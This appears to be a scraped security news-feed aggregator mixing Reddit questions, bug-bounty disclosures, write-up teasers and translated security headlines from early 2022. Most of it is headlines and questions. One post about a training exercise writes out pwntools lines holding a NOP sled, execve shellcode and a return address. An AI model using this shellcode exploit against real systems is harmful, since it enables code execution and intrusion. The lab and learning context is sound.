• Open

    Threat Model Stakeholders from a security team?
    Who are the appropriate personnel to include in a threat model from a security standpoint? Security Architects? Engineers? SOC analysts?? Vulnerability management personnel? Compliance? submitted by /u/bankster24 [link] [comments]
    RBAC question
    Hello, I am not in cyber however I am developing an org structure as part of my school assignment. The roles I came up with that are part of driving the RBAC implementation are: Role Dev Lead, Role Eng. Lead, Role Decomm. Lead, Role Maint. Lead and Auditor Lead. Are they close to RL roles? Thanks! submitted by /u/Hav0c_wreack3r [link] [comments]

  • Open

    Does connecting to a network via Ethernet have any extra security risks vs connecting via WiFi?
    As in, if someone has access to your network via Ethernet does it have any extra security risks to your system compared to if they were connected via WiFi? I'm thinking it depends on the type of internet your connection uses, e.g. fiber, cable, DSL, etc. submitted by /u/computerstuffs [link] [comments]
    How do you stay motivated to learn and prevent burnout?
    I'm already in a somewhat senior engineering role so I'm not forced to learn for school or to get a better job. I always want to keep driving myself to learn new things and stay on the cutting edge of infosec in order to both be more knowledgeable in my current role but also for my own curiosity. Balancing this with a full time+ career as well as family and social obligations feels exhausting sometimes. What do you guys do to stay motivated? submitted by /u/Deliveranc3 [link] [comments]
    What are your favorite data visualizations and analytics?
    Be it for threat hunting or making sure everything's hunky dory, for reporting activity or predicting trends, what do you like to see graphed, and what insights does it give you? I'm looking for more tools for the toolbelt. submitted by /u/Outside-Log-2104 [link] [comments]
    How to open 120 GB SQL file than without my pc ?
    My SSD is low capacity, how to open ? submitted by /u/mefumetsub [link] [comments]
    What was running in the shell when I logged in to a compromised server?
    I have some old sites I run for friends and family on a shared small webhosting place that has a cPanel Linux server. I don't use cPanel for much and don't know all that much about it. I forgot about a WordPress site I was running and someone got it and was able to then compromise the cPanel login. Shame on me for letting a WordPress site sit vulnerable, I know. But it happens. They were then able to get into cPanel. So they loaded up a few WordPress sites with phishing site stuff, and also sent out some phishing emails, all pretty standard stuff I've seen before. Lots of base64 php files and other standard WP hack php stuff. Something I hadn't seen before happened when I SSHed into the server, and I'm not sure what it was or what they had running. I logged in and immediately saw an error that I don't exactly remember, but it was a normal looking error about "no shell", I couldn't do anything, it was just an empty shell. None of the standard commands worked. So I logged in, and something caught my session and had me in... I don't know what. I did ctrl-d or maybe ctrl-c and was back to the normal shell on that server. Things looked normal again. I wasn't even sure I was on the server at first, so I didn't capture the exact errors I was seeing before the return to normal. One thing that I did notice was the title of my session in iterm2 had changed to what looked like a list of files on the server with ^M in between the names. So, something like access-logs^M^application-backups^M^dbs^M^ and so on, all the root level directories. By the time I gave it any thought, I had already cleaned up most everything and killed a couple of running processes. Any idea what I got into when I logged in to there? submitted by /u/blakesterz [link] [comments]
    Can url/ip of microservice being requested by a server be found out?
    I currently have a Ruby on Rails server that does server-side rendering, and it calls one of my microservices. I have Basic Auth implemented for that microservice, but I wonder if it is possible for someone to find where that microservice is and the header/body of my request? Can that be safely prevented by HTTPS? submitted by /u/hksparrowboy [link] [comments]
    How to best visualise risk from vulnerability findings based off CVSS scores?
    We got a report for the vulnerabilities across a system. The findings showed around 40 high vulnerabilities, 150 medium vulnerabilities and 300 low vulnerabilities. The problem I have is how to visually get this across to management as I can make it a simple pie chart but because of the 300 low vulnerabilities dwarfing the 40 high vulnerabilities it doesn't come across particularly well. Does anyone have any ideas? Also we've created a calculation to plot the average score by using cumulative total of all CVSS scores divided by the number of findings and because there's so many low findings with low scores this is causing it to look better than it is as having around 40 high vulnerabilities isn't good. Does anyone have any sort of formulas or calculations I can use to get this risk score across better? Thanks submitted by /u/nimdroid [link] [comments]
    Tool to manage vulnerabilities from different sources?
    OK so the basics are that we're looking for a tool that we can use to group together and manage vulnerabilities found from multiple other sources/scanners (preferably open source). We're not looking for anything that will run its own scans; rather, manages already found reports... if that makes sense. At the moment, we're currently using an Excel spreadsheet to group everything together. If anyone has any suggestions that would be a life saver, thank you in advance. submitted by /u/Autumn-shadow [link] [comments]
    Sandvine technology for newbie
    Hello, My friend worked in Blueteam domain as Network security mostly on Firewalls, WAF, IPS etc. solutions. He lost his job earlier and saw an opening at Sandvine which he applied and got a call for interview but he is not sure what type of questions expected. Appreciate if anyone can advise what should he study and what type of questions to be expected and response. TIA submitted by /u/junostik [link] [comments]
    Conducting CMMC - NIST 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations at the company I work for
    Hey all, just started a job and I have to run some tests on use cases/artifacts/evidence scenarios. The company wants me to enter their IT Security Labs, and check items out of date such as routers, where firewalls are located, etc. There are 110 controls and I need to align a majority of the company's internal systems and processes with NIST 800-171 for CMMC. What is the best way to do this? submitted by /u/LordCommanderTaurusG [link] [comments]
  • Open

    GRAPHQL cross-tenant IDOR giving write access thought the operation UpdateAtlasApplicationPerson
    Stripe disclosed a bug submitted by bubbounty: https://hackerone.com/reports/1066203 - Bounty: $2500
    objectId in share location can be set to open arbitrary URL or Deeplinks
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1337178 - Bounty: $100
    PHP Info Exposing Secrets at https://radio.mtn.bj/info
    MTN Group disclosed a bug submitted by pudsec: https://hackerone.com/reports/1049402
  • Open

    Phonebook, the way to DoS a company
    I had to add my personal info to a phonebook, which I don’t like, so I took down the server ;) Continue reading on InfoSec Write-ups »
    My Pentest Log -9- (Open Redirect Vulnerability)
    Greetings from Kerkoporta to all, Continue reading on Medium »
    Gallery Tryhackme Walkthrough part-1
    File uploading attack Continue reading on Medium »
    Log4shell in google $1337.00
    Looking through the google cloud console for products “https://console.cloud.google.com” to look for bugs i came across VMware Engine. Continue reading on Medium »
    Full Account Takeover due to improper validation of old password
    Hello Hackers and Security community. I’m going to share how I’m able find the bug. Continue reading on Medium »
    ($$$) IDOR via GET Request which can SOLD all User Products
    Hi everyone, Continue reading on Medium »
    Blind-XSS Disappointment
    Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. Continue reading on Medium »
    Misconfiguration OAuth Lead Account Takeover #Part 2
    Here are my bounty bug findings regarding Misconfiguration OAuth Lead Account takeover Part 2 Continue reading on Medium »
    How I managed to make a DDoS attack by exploiting a company’s service — Bug Bounty
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to tell you about an event that happened to me while I was… Continue reading on Medium »
    Account Enumeration Hacking Tool Created By Python For Finding Username Of Your Target Websits…
    Hi guys in this tutorial you will learn how to create python script for finding username of admin panel of target wordpress website and… Continue reading on Medium »
  • Open

    Reversing embedded device bootloader (U-Boot) - p.1 - Shielder
    submitted by /u/smaury [link] [comments]
    Put an io_uring on it: Exploiting the Linux Kernel
    submitted by /u/eberkut [link] [comments]
    DomainProactive: Security Monitoring for Internet Presence
    submitted by /u/genemcculley [link] [comments]
    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    submitted by /u/AlexForster [link] [comments]
    Three critical 0-days allow RCE and even physical ignition in APC UPS
    submitted by /u/Subterminal303 [link] [comments]
    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    submitted by /u/YuvalAvra [link] [comments]
    PreAuth RCE in Passcom Cloud Phone Systems found by Kerbit Security Firm.
    submitted by /u/nathanAbejeM [link] [comments]
  • Open

    Ukraine Invasion, Week 2 + more
    Welcome to the 3rd edition of the discursus Protest Analytics newsletter. Continue reading on discursus.io »
    Link to the Bellingcat Documentary Film — Truth in a Post-Truth World
    Sumbubotol.com, November 27, 2019 — Good news today. Sumbubotol.com congratulates Submarine Amsterdam, which succeeded… Continue reading on Sumbu Botol »
  • Open

    BHI: The Newest Spectre Vulnerability Affecting Intel and Arm CPUs
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=BHI-Spectre-Vulnerability Comments URL: https://news.ycombinator.com/item?id=30603762 Points: 5 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://slashdot.org Comments URL: https://news.ycombinator.com/item?id=30601465 Points: 1 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/ Comments URL: https://news.ycombinator.com/item?id=30596044 Points: 39 # Comments: 10
  • Open

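    [Security Advisory] Linux DirtyPipe local privilege escalation vulnerability (CVE-2022-...
    Recently, a DirtyPipe local privilege escalation vulnerability in Linux surfaced online; any unprivileged local user can use this vulnerability to obtain root privileges. ...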
  • Open

    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    Article URL: https://blog.cloudflare.com/cve-2022-26143/ Comments URL: https://news.ycombinator.com/item?id=30602912 Points: 4 # Comments: 0
    Security advisory for the regex crate (CVE-2022-24713)
    Article URL: https://blog.rust-lang.org/2022/03/08/cve-2022-24713.html Comments URL: https://news.ycombinator.com/item?id=30600044 Points: 4 # Comments: 0
  • Open

    Extended Attributes and TCC on macOS
    This blogpost will describe how Transparency, Consent, and Control (TCC) affects extended attributes on macOS Continue reading on Medium »
  • Open

    What is life like as a female digital forensic investigator?
    I am just curious about how females go along in this field as I am currently doing a BSc in Business Management and Information systems and want to be a digital forensic investigator. submitted by /u/SkillKiller3010 [link] [comments]
    Internship Preparation Help for State Forensic Agency
    Hey everybody, I was lucky enough to be considered for a digital forensics internship position with my state's primary forensic agency. I've worked practice cases at my university using FTK and AXIOM, and I have research experience making a forensic image and working a case from beginning to end. Could anyone provide any tips to help me prepare for the interview? I have an incredible opportunity, and I want to make the most of it that I can. submitted by /u/Tuuin [link] [comments]
  • Open

    Expanding the Hound: Introducing Plaintext Field to Compromised Accounts
    Introduction When doing an Internal Penetration Test, it is not uncommon to run BloodHound at one point or another. In case you are not familiar with BloodHound, it’s a tool that automatically fires off a bunch of LDAP queries and Windows API calls to collect various data in an Active Directory environment. Data can range... The post Expanding the Hound: Introducing Plaintext Field to Compromised Accounts appeared first on TrustedSec.
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed – we provide a technical analysis. The post Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities appeared first on Unit42.
  • Open

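    New-generation banking trojan SharkBot is spreading through the Play Store
    SharkBot is a banking trojan that can bypass multi-factor authentication mechanisms to steal bank account credentials.
    FreeBuf Morning Report | Google's request to dismiss data breach lawsuit rejected; leaked Nvidia data used to create malware
    Alphabet shareholders are suing Google because Google deliberately concealed a security vulnerability, leading to the leak of users' private data. In October 2018, US media reported that the incident led to the leak of the personal data of nearly 500,000 Google+ users.
    Hackers worldwide drawn into the Ukraine-Russia turmoil! What lies behind the digital cyber war deserves deep reflection
    This is the first global-scale hacker cyber war of the digital age, one in which multiple nation-state hacker forces have joined in, with nations as the targets and core critical infrastructure being destroyed! [Lead] On February 24, between Ukraine and Russia
    Investigation of in-the-wild container security attacks
    Cloud-native security companies have sprung up like mushrooms after rain, and the major cloud vendors are also actively building their own cloud-native security capabilities to protect the assets of their cloud customers.
    Quick look! 23 major cybercrime statistics for 2021-2022
    Since the COVID-19 pandemic, cybercrime has been on the rise. Ruicheng Information (锐成信息), which focuses on cybersecurity, has collected here the most notable cybercrime statistics of 2021 and industry experts' predictions for internet security trends in 2022.
    Join the CIS 2021 Spring Edition livestream on March 9, with a 10,000-yuan red envelope shower waiting for you to grab!
    At 9:30 a.m. on March 9-10, stay tuned to the official CIS2021 Spring (Spring Edition) website; great talks and really nice prize activities are waiting for you.
    Reflections on "data-centric" data security practice
    From traditional industries such as telecom operators, energy, healthcare and finance to the emerging internet industry, a wave of data security construction has been set off.
    White-hat interview | Hello everyone, I'm A Yang, a full-time bug hunter!
    "Create with dreams and courage, prove with conviction and hard work." Hello everyone, I'm A Yang. I taught myself penetration testing to get into the security community, and I am currently a full-time bug hunter on The loner security team, skilled at finding business logic vulnerabilities and earning generous bounty rewards.
    Firefox hit by two more 0-day vulnerabilities; upgrading as soon as possible is recommended
    Recently, Mozilla released an out-of-band security update for the Firefox web browser that covers two high-impact security vulnerabilities.
    Hacker group breaches Russian media, broadcasts footage of the war in Ukraine
    Russian media suffered a cyberattack, and footage of the war inside Ukraine appeared.
    Guide to using Metasploit locally
    When working on projects, starting up a virtual machine every time is inconvenient, and on low-spec computers having too much running in the background also causes lag. Installing and using it locally is simply more convenient and quicker, which improves efficiency. It can also be deployed on a VPS or similar, which makes internal network penetration testing convenient.
    FBI: 52 US critical infrastructure entities have been breached
    As of January 2022, the FBI has determined that, across the 10 critical infrastructure sectors that were attacked, at least 52 critical infrastructure entities were breached, spanning critical manufacturing, energy, financial services, government and information technology.
    Samsung confirms hackers stole Galaxy device source code
    Samsung confirmed on Monday that its network had been breached by hackers and that confidential information, including source code for Galaxy phones, was stolen.
    Coinbase is blocking more than 25,000 Russia-linked cryptocurrency addresses
    On March 7, the popular cryptocurrency exchange Coinbase announced that it is blocking more than 25,000 cryptocurrency addresses linked to Russian individuals and entities.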
  • Open

    Movies from 1940 until last weekend! Busy site so starts slow(That’s what I’m blaming it on) lol
    submitted by /u/Yankeeslv [link] [comments]

  • Open

    Pentesting toolkit: all you need to know
    Red Teams use a comprehensive and complete toolkit to expose different platforms and get accurate results when reporting failures, data… Continue reading on Medium »
    Phishing Tools
    Phishing is one of the most serious threats in the digital world. Phishing makes people fool. Phishing email always looks like same as the… Continue reading on Medium »
  • Open

    Why do ISP ask for your SSN when signing up for their services?
    When I was signing up for spectrum they asked for my SSN, I gave to them since. How scared am I? submitted by /u/Empty-Ad1458 [link] [comments]
    What Windows based non Github program would allow me to brute force a TrueCrypt volume?
    Years ago I made some TrueCrypt volumes and forgot about them. I have now found them and forgotten some of the password. I know what the first half was and what some of the second half was but don't know where I put special characters or capital letters. I'm not good with git hub so is there a non-Github program that will let me enter the known parts, I can tell it to try every possible character in certain spaces, and only lower case and uppercase of certain letters i.e. m or M? submitted by /u/TerribleFruit [link] [comments]
    How to Fill My Knowledge Gaps as Quickly as Possible?
    I've been fascinated with cyber/net sec since I was a teenager who wanted to be a '1337 hax0r' (doesn't every nerdy teen wanna be one?). However, I went into Web Development. As I went I did have to learn about defensive coding techniques against SQL injection, path escalation, etc. I worked for financial, insurance and ISO270001 companies and thought I had a reasonable grasp of things since I'd done some sysadmin along the way installing Fail2Ban, Tripwire, etc. I even have the compact red, blue and purple team reference books and Parrot Sec on one partition I occasionally used to play with sec tools and have a Shodan account. I knew about Metasploit but had only done one tutorial. Fast forward to now: I need a career change after dev-burnout. I look into cyber sec and BOOM! Suddenly I see a ton of shit I've never seen before: SIEM? Mitre Att&ck? IoT Bots (have my ESP32 climate monitoring boards become an attack vector?!) TTPs? What on earth happened in the past few years that I missed? I barely recognise the industry anymore. I lifted my finger off the pulse for a few seconds and suddenly it's a different beast entirely. Can some kind soul point me to a good YouTube channel, guide, book, (free/cheap) course that will fill in the gaps I've missed the past few years? submitted by /u/adminsuckdonkeydick [link] [comments]
    Can exact ip addresses be spoofed?
    Recently noticed activity that I didn't really remember doing on an account, but it was from my exact ip address. I have a limited understanding of ip addresses, but spoofing a specific address isn't really possible, as you won't receive anything from the site you are trying to reach, correct? A proxy needs to be used, which is already a set "spoofed" ip, right? . submitted by /u/SaucyBoiTybalt [link] [comments]
    How do I Remove FireEye from a Host?
    Does anyone know where I can find instructions or documentation about removing FireEye from a host? Specifically what registry keys should be deleted? Does anyone have experience with this request? Thank you for taking a look! submitted by /u/ELcup [link] [comments]
    Cyberstalking & Hacking
    Hey r/AskNetsec, I'm getting hacked by two lecturers at my university. I know this and do not want to call the police as I have no evidence of them hacking me. I'm a student and have no money to pay for a digital forensics investigation to be done. How do I stop them from hacking me. They're hacking all my devices and families devices. They also are hacking my email account using a cookie stealer. I have no idea how to stop this and this has become cyberstalking. I'm a South African, I cannot contact the FBI or foreign charity organisations either. I don't want to involve the police since, all they have to do is stop hacking me, then I could get prosecuted for falsely accusing someone of committing a crime. Any advice or help with the situation would be appreciated. Best regards, Anon submitted by /u/Independent_Art_9954 [link] [comments]
    Ask for help, I think I was attacked by phishing
    A few days ago, I happened to see a message from Facebook. I went through the link without thinking and since then, I have since countless spam emails, and several times a day, I have been notified of membership registration and logout for sites that I do not need to log in at all the time. After that, I found out that something was wrong. Perhaps attacked by phishing. The Facebook site on the link I entered was a well-made site very similar to a normal site. In addition, there was no doubt at all because it was possible to log in, search, news articles, and content within the site. Banners, search windows, newsstand windows, login windows, and putters at the bottom were configured in a very similar way. And as a result, I had no choice but to renew all my personal contact information and e-mail addresses. I've only encountered the kind of writing to be careful of phishing sites, but I feel quite bad that I'm actually being attacked. Beyond feeling bad, it is creepy that other people view and use my personal information without permission. In order to prevent access to phishing sites and prevent personal information from being leaked, it is necessary to check if the domain is normal when receiving e-mails or text messages containing links. So I want to ask. What is a way to verify that it is a normal domain when receiving mail and text messages containing links? Is there a service or system that determines a link to a web page normal or dangerous when i enter suspicious link to search box? submitted by /u/Late_Ice_9288 [link] [comments]
    Introduction to Networks materials
    Hey Everyone, I have a new mentee who wants to learn networking. She is completely from a non IT background. Could you please suggest some good basic references/trainings that she can learn from. I know of some CCNA and Comptia instructors who start from quite basics but wanted to check if there is some other non certifications course that she can start with. submitted by /u/wackynerd14 [link] [comments]
    Potential DNS Attacks
    As this is a very hot topic, I'd like to prefix this with me saying I am trying to keep this 100% politics-free and strictly technology-related. That said, I read earlier today that there's a possibility of Russia forcing the use of their own DNS servers as of March 11: https://www.thetechoutlook.com/news/new-release/software-apps/breaking-news-russia-is-preparing-to-disconnect-from-the-global-internet I do not know the validity of the news itself, so I'm hoping to keep this strictly on the technical aspect in the case the order does happen. If we have vendors that hold offices in Russia and can access to our VPN (let's also assume we do not have control over our vendor's offices): could this new order introduce any additional risks to our network? Our VPN should deny all requests with an invalid SSL certificate, but does anyone think the order could introduce any additional risk of DNS attacks? (at least directly?) Assuming users do not ignore SSL warnings, would this be any more of a concern than usual? Thanks in advance! submitted by /u/HPCer [link] [comments]
  • Open

    GitHub - klezVirus/SysWhispers3: SysWhispers on Steroids - AV/EDR evasion via direct system calls.
    submitted by /u/dmchell [link] [comments]
    PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell
    submitted by /u/dmchell [link] [comments]
  • Open

    Palined Google OD search went down
    submitted by /u/Raven_Claw7621 [link] [comments]
  • Open

    A new speed milestone for Chrome
    Everyday, billions of people around the world turn to Chrome to get things done quickly on their devices, whether shopping for a new pair of headphones or pulling together a sales report for work. Nothing is more frustrating than having a slow experience while browsing the web. That’s why Chrome has always been focused on building the fastest possible browser since its launch in 2008, without compromising on feature functionality or security. In our first The Fast and the Curious post of 2022, we are thrilled to celebrate how in the M99 release of Chrome we were able to substantially increase the speed of Chrome across all major platforms. We go deep on every platform where Chrome runs to provide the fastest possible experience. We’re excited to announce that in M99, Chrome on Mac has ach…
  • Open

    PHOTON
    (LET’S EXPLORE WEBSITE) Continue reading on Medium »
    Some critical vulnerabilities found with passive analysis on bug bounty programs explained
    This post describes three vulnerabilities found on paid bounty programs along with an overview about how it was found and the performed… Continue reading on InfoSec Write-ups »
    March OSINT Musings
    In light of the current events occurring in Ukraine now would be a good time to: Continue reading on Medium »
  • Open

    Critical cross-account vulnerability in Microsoft Azure automation service
    Article URL: https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30589845 Points: 213 # Comments: 41
    The Dirty Pipe Vulnerability
    Article URL: https://dirtypipe.cm4all.com/ Comments URL: https://news.ycombinator.com/item?id=30586740 Points: 673 # Comments: 232
  • Open

    Web Cache Poisoning leads to Stored XSS
    Glassdoor disclosed a bug submitted by bombon: https://hackerone.com/reports/1424094 - Bounty: $2000
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
    submitted by /u/FoShizzleMyWeasle [link] [comments]
    The Dirty Pipe Vulnerability [CVE-2022-0847]
    submitted by /u/moviuro [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    Computer Forensics and Investigation Project
    Hi Team, Need suggestions for any websites where I can find a reference scenario of a cybercrime where you have to do a computer forensics on a victim's PC. For example a hacking incident, you have to verify or investigate how he/she was hacked. The report shall include the creation of a hypothetical scenario of a crime committed involving the said electronic device, as well as, a detailed description of the forensic examination, tools used, procedure, and findings, evidenced with the necessary screenshots and ensure all screenshots have the necessary verifiable names. This is a school project for my cybersecurity program and it is only my term 1. Thank you so much! submitted by /u/bankshot15 [link] [comments]
    Avoid modifying the smartphone evidence
    To present forensic analysis in the court, we can't modify smartphone evidence, although I have put android phone in airplane mode, I still worry about modifying smartphone data during cellebrite ufed phone extraction, how to avoid tampering with evidence during extraction? For linux image analysis, I can mount as read only, how about smartphone? submitted by /u/cyberfo [link] [comments]
    How do I get Laptop serial number from E01 image?
    Yep..someone fucked up the chain of custody forms submitted by /u/MasterBet [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
    DNS poisoning or DNS hijacking
    we encounter a lot of packages with small ttl in our pcap files, is this the symptom of DNS poisoning attack, or dns hijacking or other dns attack, like ddos? submitted by /u/cyberfo [link] [comments]
    how to detect C2 communication from log
    how to detect C2 communication from log, we have method to detect beaconing, but now has difficulty in detect Command and control command, we have no clue, anyone know how to detect it through splunk log? submitted by /u/cyberfo [link] [comments]
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

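    Implementation and application of zero-trust-based remote work security technology
    A zero-trust-based remote work security solution can break free of the host and easily ensure the continuity of remote work operations.
    MIIT releases the "Guidelines for the Construction of the Internet of Vehicles Cybersecurity and Data Security Standard System"
    By the end of 2023, a standard system for Internet of Vehicles cybersecurity and data security will be initially established; by 2025, a relatively complete standard system for Internet of Vehicles cybersecurity and data security will be formed.
    Uncovering the CapraRat malware of the APT36 group
    We will continue to introduce some internationally notorious APT groups, so that we can better understand and avoid this malware.
    A brief summary of network security vulnerability analysis
    Starting from the vulnerable points, this post analyzes the vulnerabilities in order to learn some approaches to white-box vulnerability discovery.
    CISA adds 95 new vulnerabilities to its actively exploited vulnerabilities catalog
    The US Cybersecurity and Infrastructure Security Agency (CISA) this week added 95 new security vulnerabilities to its exploited vulnerabilities catalog, bringing the total number of exploitable vulnerabilities in it to 478.
    It's 2022 already: are password managers still secure?
    This article takes a fresh look at password managers and answers several important questions about them.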

  • Open

    Using Google hacking to search Telegram channels
    I was looking for pro-Putin channels on Telegram, using a Google Dork. That this is also a practical example of using Google hacking… Continue reading on Medium »
    10 OSINT Tools Hackers Need to Know About
    Open source intelligence is a vital task for the red team and blue team alike. Here are some of the most useful OSINT tools. Continue reading on Medium »
    Send Google Alert To Slack
    Automatic Free Crawler By Google Continue reading on Medium »
    Final Recon — OSINT Tool for All-In-One Web Reconnaissance
    Final Recon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be… Continue reading on Medium »
  • Open

    help with making money
    Hey everyone I would like to join the security game. i have a background in programming, how computers and software works what is the fastest way to make money in the security field? I'm here not only for money i really like this field but i need to make money fast i have pills to pay and i can't get a job appreciate any help and guide submitted by /u/timet0fly [link] [comments]
    AlienVault OSSIM - Step by Step Tuning after Installation
    Hi there, I'm interested to test this SIEM for education purposes. I downloaded the latest version from the official site and installed it on my VMware. But I stumbled upon the fact that I do not fully understand how best to configure everything. I did not find any deep step-by-step documentation on the official portal. And most likely I can miss a lot through undetailed documentation. Do I understand correctly that Suricata works out of the box? I don't need to install an agent on a Windows host? When I installed HIDS on my Windows host, I had a lot of weird events where the destination IP is displayed - 0.0.0.0. And I don't even know how to make a rule, so these events are not reflected. I googled and other people had such problems and there is no solution. Who works a lot with this SIEM, perhaps from your experience, you could share recommendations on what to do, what to do after installing this SIEM. I also haven't fully figured out how to run FIM. submitted by /u/athanielx [link] [comments]
    Is it possible to be hacked by private networks/hidden SSIDS near your area?
    I believe my neighbors are watching me using private networks. I have an app that shows hidden SSIDs. I think they are using these networks to see and listen to what I'm doing on my devices. submitted by /u/AshuraSenkuu [link] [comments]
    Potential drive-by 0-click 0-day on chrome
    There is an ongoing bug in chrome that allows attackers to download files in the background into the victims machine without triggering any gui updates, I first experienced this about two months ago when I was trying to close the browser only to be interrupted by a chrome prompt informing me that there are ongoing downloads in the background that weren't started by me and display no sign of the downloading process on chrome's gui. I was a bit alarmed but I didn't pay it too much attention. Then I got curious when yesterday I had the same experience again, this time obviously I clicked 'continue downloads', I was taken to chrome download page where I found that chrome had intercepted and flagged a 'malicious file' and it was offering me to either 'keep' or 'discard' said file, regrettably …
  • Open

    Frelatage: A new Coverage-Based Python fuzzing library
    Hello everyone! I am a 21 year old French cybersecurity enthusiast and I would like to share with you Frelatage, which is a tool I wrote! It is a coverage-based Python fuzzing library which can be used to fuzz python code. The development of Frelatage was inspired by various other fuzzers, including AFL/AFL++, Atheris and PyFuzzer. The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz python applications. Please note that the project is still in early alpha, and its development is very active, so any advice or suggestion is welcomed! Install: https://github.com/Rog3rSm1th/Frelatage https://i.redd.it/m88potyk9tl81.gif submitted by /u/FrenchFuzzer [link] [comments]
    Shellcode Buff Overflow Question
    As I was going through protostar Phoenix Stack overflows I came across something on the Stack-Five exercise that I don't quite understand on amd64. https://exploit.education/phoenix/stack-five/ Basically I can get the exploit to work when the nop sled is 80 characters long but when I have it 88 characters long I get a seg fault. This works: t.sendline('\x90'*80 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*29 + pwn.p64(0x7fffffffe5d0)) This gives a segfault: t.sendline('\x90'*88 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*21 + pwn.p64(0x7fffffffe5d0)) Does anyone know why the second one doesn't work? submitted by /u/Jasonsaccount [link] [comments]
  • Open

    Backdooring WordPress using PyShell
    submitted by /u/jonas02 [link] [comments]
    Escaping privileged containers for fun.
    submitted by /u/JordyZomer [link] [comments]
  • Open

    Going beyond the surface: Vulns that pay well
    These days bug bounty hunters have been finding many low hanging fruits and a lot of them want to go beyond those bugs. This blog is for… Continue reading on InfoSec Write-ups »
    All About Access Control Part-1
    Hello Myself Manan Aggarwal a student from the BTech CSE is here to Present you the Blog about the All About the Access Control Part-1… Continue reading on Medium »
    A short story of IDOR for your perspective
    Hi all, I hope all is well. In this story, I’ll explain an idor bug which I found in a private bug bounty program. This story will very… Continue reading on Medium »
    SSRFire - an automated SSRF finder
    An automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Continue reading on Medium »
    WhatsApp Bug Bounty: Bypassing biometric authentication using voip
    Bypassing biometric authentication just by making a call and access the app completely Continue reading on InfoSec Write-ups »
    HOF In 3 Minute Using Low Hanging Fruits
    Hello, Security Guys & Hacker In this Write Up I am Going to tell you about Continue reading on Medium »
    Response Manipulation leads to Account Takeover
    This is a short story about my recent bug hunting on a private program. This program mainly relies on OTP to check user’s authentication… Continue reading on Techiepedia »
    Weak Registration Implementation
    Let us learn some P4 bugs Continue reading on Medium »
  • Open

    SecWiki News 2022-03-06 Review
    No news updates yet today. For more recent articles, visit SecWiki
  • Open

    Unrecoverable and recoverable windows file
    In my forensic image, some deleted files I can recover, some can not. How Encase determine which files are not recoverable internally? For data carving, how Encase retrieve internally those files, are they use same techniques compared with recover deleted files? thanks. submitted by /u/cyberfo [link] [comments]
    X-ways linux image analysis
    In X-ways, if I browse the root directory of image, I found free space, idle space and slack space, can anyone explain what's the difference among these three spaces? In filter attribute, there are SUID/SGID, symlink and special file. I thought suid file are special file, what are the special file X-ways refer to? symlink means hardlink or soft link? submitted by /u/cyberfo [link] [comments]
    Physical acquisition on unrootable phone?
    Hi all. I'm an intern in computer forensics and I'm trying to perform a physical acquisition on an oppo phone which is unfortunately unrootable as far as I know. I have Cellebrite UFED and MobilEdit but both of them require rooted devices. Any advice for this case? Tysm submitted by /u/juneflorence [link] [comments]
  • Open

    Evading Network Defense with Protocol Manipulation
    Signature based intrusion detection or prevention systems, will detect malicious activity through a predefined signature. If a Red Team… Continue reading on Medium »
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    The (Mis)Use of Artifact Categories, pt II
    My previous post on this topic presented my thoughts on how the concept of "artifact categories" were being misused. My engagement with artifact categories goes back to 2013, when Corey Harrell implemented his thoughts on categories via auto_rip. I saw, and continue to see, the value in identifying artifact categories, but as I alluded to in my previous post, it really seems that the categories are being misused. Where the artifacts should be viewed as providing an indication of the categories and requiring further analysis (including, but not limited to the population of artifact constellations), instead, the artifacts are often misinterpreted as being emphatic statements of the event or condition occurring. For example, while an entry in the ShimCache or AmCache.hve file should indicate …
    DFIR Reporting
